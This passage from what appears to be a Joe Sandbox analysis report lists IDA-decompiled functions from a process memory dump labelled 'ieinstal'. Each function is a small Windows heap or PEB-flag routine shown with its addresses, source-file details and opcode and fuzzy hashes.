					if( *__ecx != 0) {
						E1EFE332D(_t12);
					}
					if( *((intOrPtr*)(_t14 + 4)) != 0) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t14 + 4)));
					}
					return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
				} else {
					return __eax;
				}
			}

0x1effbd74
0x1effbd78
0x1effbd7c
0x1effbd80
0x1effbd82
0x1effbd82
0x1effbd8b
0x1f03792a
0x1f03792a
0x1effbda3
0x1effbd7b
0x1effbd7b
0x1effbd7b

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f148ede0e5463eb6edfe922dc4616cc1137ebdaa4300e21df3ff2bea6fa7f542
Instruction ID: a7a33237385ffd2707abd181ed0d6760a49d6b5e993978ac7ce81e210ad3aeb1
Opcode Fuzzy Hash: f148ede0e5463eb6edfe922dc4616cc1137ebdaa4300e21df3ff2bea6fa7f542
Instruction Fuzzy Hash: 5AE09237542A91DFC7369F18DD30F9A37E5EF40B11F0A0A1AAD820B9B08720EC80C691

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD1B80 Relevance: .0, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFD1B80(intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t10;
				void* _t14;
				intOrPtr _t15;

				_t15 = _a4;
				if(_t15 == 0) {
					L6:
					return E1F094A6D(_t10, _t11, 0, _t14, _t15);
				}
				_t11 = _t15;
				if(E1EFD1BC4(_t15, 0) == 0 ||  *((intOrPtr*)(_t15 + 4)) != 0x1ef9114c ||  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return E1EFD1BE7(_t15);
				}
			}

0x1efd1b86
0x1efd1b8b
0x1efd1bbd
0x00000000
0x1efd1bbd
0x1efd1b8f
0x1efd1b98
0x00000000
0x1efd1bb1
0x00000000
0x1efd1bb3

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c2f4abb697307ab828c0800fc73dfa91d476fdb532a30ca0f52e3ef3a84a99
Instruction ID: f3dddb7c80de35f53348ff8230144348b1093075129bf586ea308fa19a329083
Opcode Fuzzy Hash: f5c2f4abb697307ab828c0800fc73dfa91d476fdb532a30ca0f52e3ef3a84a99
Instruction Fuzzy Hash: 32E0D8356117A457C7219716427090A7FCABB80D6070E8399EC5947A01EB39ED4486E5

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBED0 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1EFFBED0(intOrPtr _a4, char _a8) {
				void* __ebp;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_t13 = _a4;
				if(_t13 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E1F094A6D(_t12, _t13, _t14, _t15, _t16);
				} else {
					_push(4);
					_push( &_a8);
					_push(0xe);
					_push( *((intOrPtr*)(_t13 + 0x24)));
					return E1F0043A0();
				}
			}

0x1effbed5
0x1effbeda
0x00000000
0x1effbef1
0x1effbef1
0x1effbef6
0x1effbef7
0x1effbef9
0x00000000
0x1effbefc

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0385992f1b44e07c5f6db36d8b716865511d134a8f8ffa353fe5f318e982f28b
Instruction ID: 601defc7aaa93d4cc08527d6272bd468c0c69c96217e602d0717d76411badcdd
Opcode Fuzzy Hash: 0385992f1b44e07c5f6db36d8b716865511d134a8f8ffa353fe5f318e982f28b
Instruction Fuzzy Hash: F6E0DF3610034CEBE700DF80C4A0F1437A9EB847A0F028115F90A8B2B0C7B4ED80CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBFE40 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBFE40(void* __ecx, signed char _a4) {
				signed int _t12;

				if(( *(__ecx + 0x40) & 0x75010f63) != 2 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					return 0;
				} else {
					if((_a4 & 0x00000001) != 0) {
						_t12 = 1;
					} else {
						_t12 =  *0x1f0b4360; // 0x10
					}
					return 0x7d0 + _t12 * 0x3480;
				}
			}

0x1efbfe50
0x00000000
0x1efbfe61
0x1efbfe65
0x1efbfe7d
0x1efbfe67
0x1efbfe67
0x1efbfe67
0x00000000
0x1efbfe72

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8fe751cac48c84c13409946bcb984607a101fdbdfb98cc04aedadb0a17a7ea6
Instruction ID: b4650e0473f9de4ab306777e9c703ab9b85f3b3c48d648a875e985515d6c1b7b
Opcode Fuzzy Hash: a8fe751cac48c84c13409946bcb984607a101fdbdfb98cc04aedadb0a17a7ea6
Instruction Fuzzy Hash: ABE0263363438A6BC311A61ACDE272237E9F750B58F2444A4ED00CF683D62BE5D1C690

Uniqueness

Uniqueness Score: -1.00%

Function 1F043C80 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F043C80(intOrPtr* _a4, intOrPtr* _a8, signed int* _a12) {
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed int* _t13;

				_t11 = _a4;
				_t10 =  *[fs:0x30];
				if(_t11 != 0) {
					_t7 =  *((intOrPtr*)(_t10 + 0xa4));
					 *_t11 = _t7;
				}
				_t12 = _a8;
				if(_t12 != 0) {
					_t7 =  *((intOrPtr*)(_t10 + 0xa8));
					 *_t12 = _t7;
				}
				_t13 = _a12;
				if(_t13 != 0) {
					_t9 =  *(_t10 + 0xac) & 0x0000ffff | 0xf0000000;
					 *_t13 = _t9;
					return _t9;
				}
				return _t7;
			}

0x1f043c85
0x1f043c88
0x1f043c91
0x1f043c93
0x1f043c99
0x1f043c99
0x1f043c9b
0x1f043ca0
0x1f043ca2
0x1f043ca8
0x1f043ca8
0x1f043caa
0x1f043caf
0x1f043cb8
0x1f043cbd
0x00000000
0x1f043cbd
0x1f043cc0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 645493e92f604b02a02d64101b5288a19b38f839eec07bcb3fe4151ee14a7077
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: DFE0AE783002059BD705CF19C044BA277A6BFD5A10F26C078A8488F309E732E8429B80

Uniqueness

Uniqueness Score: -1.00%

Function 1F07AF50 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F07AF50(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = E1EFBCEF0(__ecx, _a4, 0xfff);
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x1f07af5a
0x1f07af6b
0x1f07af81
0x00000000
0x1f07af86
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
Instruction ID: a74def29b81e7b5a9d0966eeca699578c299ca8c637a3a1f157a9110cc7d0a09
Opcode Fuzzy Hash: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
Instruction Fuzzy Hash: 70E0CD31385285B7DB214AD0CC10F597B55DB50791F104271FE445A6A0CA75FC91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB8C3D Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1EFB8C3D(intOrPtr __ecx) {
				intOrPtr _t11;

				_t11 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					_push( *((intOrPtr*)(__ecx + 0x14)));
					E1F0030B0();
				} else {
					if( *((intOrPtr*)(__ecx + 8)) != 0) {
						_push(0);
						_push( *((intOrPtr*)(__ecx + 8)));
						E1F002A70();
					}
				}
				return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t11);
			}

0x1efb8c40
0x1efb8c46
0x1f01b645
0x1f01b648
0x1efb8c4c
0x1efb8c50
0x1efb8c65
0x1efb8c67
0x1efb8c6a
0x1efb8c6a
0x1efb8c50
0x1efb8c64

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction ID: 5394ba9bc15a20db90b239cb97bc3d8494ce3d5d17740db32c93eaa19d827d9e
Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction Fuzzy Hash: 1AE04F71016A91DED7316F12DD11B42B6A1AB40B10F144A2AE541054A08B65E884C655

Uniqueness

Uniqueness Score: -1.00%

Function 1F048F3C Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F048F3C() {
				signed int _t9;
				signed int* _t13;

				_t9 =  *0x1f0b5a74; // 0x0
				if((_t9 & 0x00000001) == 0) {
					if((_t9 & 0x00008000) != 0) {
						 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					}
				} else {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					_t13 =  *0x1f0b3738; // 0x772546bc
					 *_t13 =  *_t13 | 0x00000001;
				}
				return 1;
			}

0x1f048f3c
0x1f048f43
0x1f048f6c
0x1f048f85
0x1f048f85
0x1f048f45
0x1f048f5a
0x1f048f5d
0x1f048f62
0x1f048f62
0x1f048f8a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47c0a8b477549c5e164140bd41d1a8424bb107b1c06c41242d5c6d633b44bad
Instruction ID: 265162e96b88212236aed3e54a09b4df72ac4f773ee6fbddde9983313d209c88
Opcode Fuzzy Hash: e47c0a8b477549c5e164140bd41d1a8424bb107b1c06c41242d5c6d633b44bad
Instruction Fuzzy Hash: 40F0ED78651A80CFE316DF04C1E1B5173FAFB45B40F6009A8D8468BBA1C73AAD42DA40

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC1F70 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC1F70(signed int __edx, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t6;
				void* _t10;
				void* _t15;
				void* _t17;

				_t16 = _a4;
				E1EFC491F( *((intOrPtr*)(_a4 + 0x5c)), __edx | 0xffffffff);
				E1EFC254C(_t10, _a4, _t15, _t16, _t17);
				_t6 =  *0x1f0b6644; // 0x0
				return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t6 + 0x100000, _t16);
			}

0x1efc1f76
0x1efc1f7f
0x1efc1f86
0x1efc1f8b
0x1efc1fa7

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4448155f9345f8834df95224664a684eab9135fcde2762b593f0d3b49cf83c11
Instruction ID: 68baa2ac33315daaa7a9a9bd3bb9d41c39a81f4d39be29174fcbdf79a638634b
Opcode Fuzzy Hash: 4448155f9345f8834df95224664a684eab9135fcde2762b593f0d3b49cf83c11
Instruction Fuzzy Hash: 90E0C2371005A46BC321EB5CCC70F8A77AEEF84670F140622F655876A0CB20FD00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC1E70 Relevance: .0, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC1E70(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t10;
				void* _t12;
				void* _t14;
				void* _t15;

				_t11 = _a4;
				if(_a4 == 0 || _a8 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1F094A6D(_t10, _t11, _t12, _t14, _t15);
					return 0xc000000d;
				} else {
					return E1EFC37E4(_t10, _t11, 0, _t14, _t15, 0);
				}
			}

0x1efc1e75
0x1efc1e7a
0x1efc1e9c
0x00000000
0x1efc1e91
0x00000000
0x1efc1e93

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7593eabf9654e90afe5080e6b013f0cdba9182d155996e74a4ef26fcbd0a9835
Instruction ID: ca7d1e089c6a34204f21a8f729d383b10ab0ad90445e1cb99a7b9bb701ddbf43
Opcode Fuzzy Hash: 7593eabf9654e90afe5080e6b013f0cdba9182d155996e74a4ef26fcbd0a9835
Instruction Fuzzy Hash: 84E0CD3D21138A8FD700E715C070F6573E66B80730F25C195DC0887501C738F9E0C610

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD3C20 Relevance: .0, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1EFD3C20(void* __ecx) {
				signed char _t8;

				_t8 =  *0x1f0b6834; // 0x0
				if((_t8 & 0x00000001) != 0) {
					if((_t8 & 0x00000002) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						_push( *0x1f0b446c);
						return 0 | __ecx !=  *((intOrPtr*)(E1F089682( *0x1f0b4468)));
					}
				} else {
					L1:
					return 0;
				}
			}

0x1efd3c20
0x1efd3c29
0x1f0269f9
0x00000000
0x1f026a0f
0x1f026a0f
0x1f026a29
0x1f026a29
0x1efd3c2f
0x1efd3c2f
0x1efd3c31
0x1efd3c31

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3ce44a336068ea1117e107c162554b8ae5928647fdb374225ae17f6be9ac64
Instruction ID: 18f1bac00c9efb3a018fffe83a6fab23f6873d2240b68779abcf8cd98f0b641a
Opcode Fuzzy Hash: df3ce44a336068ea1117e107c162554b8ae5928647fdb374225ae17f6be9ac64
Instruction Fuzzy Hash: 89E0127E602151CBCF06DB14C9B0B8537E2FB81A55F1605B4E50396668C736D975FA10

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC3E01 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC3E01(void* __eax, void* __edi, intOrPtr __esi) {
				void* _t4;
				intOrPtr _t5;
				intOrPtr _t11;
				void* _t13;

				_t11 = __esi;
				_t4 = __eax;
				if( *((intOrPtr*)(_t13 - 0x24)) != 0 || __edi < 0) {
					if(_t11 != 0) {
						_t5 =  *0x1f0b6644; // 0x0
						return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x200000, _t11);
					}
				}
				return _t4;
			}

0x1efc3e01
0x1efc3e01
0x1efc3e05
0x1f01ffa2
0x1f01ffa8
0x00000000
0x1f01ffc4
0x1f01ffa2
0x1efc3e13

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c43815c93bef179e294bb5bd0c70a508065c242aeb4b1f351b6a7eabe70c63
Instruction ID: 9f3d9f8c293182cd04877e03f595386e0289bd13a4053ff98c3136cf88396b09
Opcode Fuzzy Hash: 05c43815c93bef179e294bb5bd0c70a508065c242aeb4b1f351b6a7eabe70c63
Instruction Fuzzy Hash: FCD02E338021208BC731CB04CA20F4A37B5EF20B20F6101C8D848AB201C37AEC21CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF9CCF Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFF9CCF(void* __eax, intOrPtr __edi, void* __esi) {
				void* _t4;
				intOrPtr _t5;
				intOrPtr _t9;
				void* _t13;

				_t9 = __edi;
				_t4 = __eax;
				if( *((intOrPtr*)(_t13 - 0x38)) != 0 || __esi < 0) {
					if(_t9 != 0) {
						_t5 =  *0x1f0b6644; // 0x0
						return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x80000, _t9);
					}
				}
				return _t4;
			}

0x1eff9ccf
0x1eff9ccf
0x1eff9cd3
0x1f035fdf
0x1f035fe5
0x00000000
0x1f036001
0x1f035fdf
0x1eff9ce1

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcc3180a060fdcf36c6d56433ab21975ff24760b33a291793b8aba4a284b8f1
Instruction ID: 88f6a8b73b2fd3bc6e7c4203d9c627d4db7d293086bd0ba7f1385a592fd4d7e6
Opcode Fuzzy Hash: 6fcc3180a060fdcf36c6d56433ab21975ff24760b33a291793b8aba4a284b8f1
Instruction Fuzzy Hash: AAD01737901552DFCB61AB49C960B1A76F5FF80B14F2A0154A841A7230DB3AA810DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFCE70 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFFCE70(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* __ebp;
				intOrPtr _t5;

				E1EFC254C(__ebx, _a4, __edi, __esi, __eflags);
				_t5 =  *0x1f0b6644; // 0x0
				return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x200000, _a4);
			}

0x1effce78
0x1effce80
0x1effce9a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06253a627d69f59e6124427d6cc7b2d3ef57f807b2125fcb1da2d956a08b27e4
Instruction ID: 6b4e59d2382e421ad926f59c1e50571c59fd84847d20c2135b96d96a728f4968
Opcode Fuzzy Hash: 06253a627d69f59e6124427d6cc7b2d3ef57f807b2125fcb1da2d956a08b27e4
Instruction Fuzzy Hash: FCD0A93B000288ABC711EF08CCA0F1A7BAAEB94B10F040421B90887222CB31FD60DA88

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFCE3F Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFFCE3F(intOrPtr __ecx) {
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t11;

				if(__ecx != 0) {
					_t7 =  *0x1f0b6644; // 0x0
					 *(__ecx + 4) =  *(__ecx + 4) | 0x00000004;
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t7 + 0x2c0000, __ecx);
					_t11 =  *[fs:0x18];
					 *(_t11 + 0xf90) =  *(_t11 + 0xf90) & 0x00000000;
					return _t11;
				}
				return _t6;
			}

0x1effce41
0x1effce43
0x1effce48
0x1effce5c
0x1effce61
0x1effce67
0x00000000
0x1effce67
0x1effce6e

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571ae103c36877b3cab1aac1397387be446e6402c8ecd7228491359ed31f1408
Instruction ID: e8cdcebd94444d3242504a087ff24cd199609eb6d3e668693dbd6462f4c772fd
Opcode Fuzzy Hash: 571ae103c36877b3cab1aac1397387be446e6402c8ecd7228491359ed31f1408
Instruction Fuzzy Hash: 2DD05E76121540DFD72ACB04C966F6937A4F700B04F0545B8A0458B920C729E814EB44

Uniqueness

Uniqueness Score: -1.00%

Function 1F048F8B Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F048F8B() {

				if( *((char*)( *[fs:0x30] + 2)) != 0 ||  *0x7ffe02d4 != 0) {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x00010000;
				}
				return 1;
			}

0x1f048f95
0x1f048fb5
0x1f048fb5
0x1f048fba

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction ID: 29079b503c8c9d4e51261f024d3e26ea3c56c805a6429fd9e0beda99540ea96d
Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction Fuzzy Hash: 79D01735A11AC48FE317CB04C1A1B407BF5F745B90F9504A8E0424BBA2C27CAA84CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBDC40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBDC40() {
				signed int* _t3;
				void* _t5;

				_t3 = E1EFD5D90(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x1efbdc4d
0x1efbdc54
0x1efbdc5f
0x1efbdc56
0x1efbdc56
0x1efbdc5c
0x1efbdc5c

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
Instruction ID: 344b124c0a3982f29a874d95f214578507b28eae453fc44b17e398962bbfcc1d
Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
Instruction Fuzzy Hash: 2BC08C74280B409AEB220F20CD22B003AA1BB40B05F8504A0AB00D90F0DBB9E800EA20

Uniqueness

Uniqueness Score: -1.00%

Function 1F043C57 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F043C57(intOrPtr _a4, intOrPtr _a8) {

				return E1EFD2710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x1f043c73

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
Instruction ID: bf1e1ee0222c0d7ab37ef654090d2f77801fa7b76dbc2aac960f527c95bd07e4
Opcode Fuzzy Hash: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
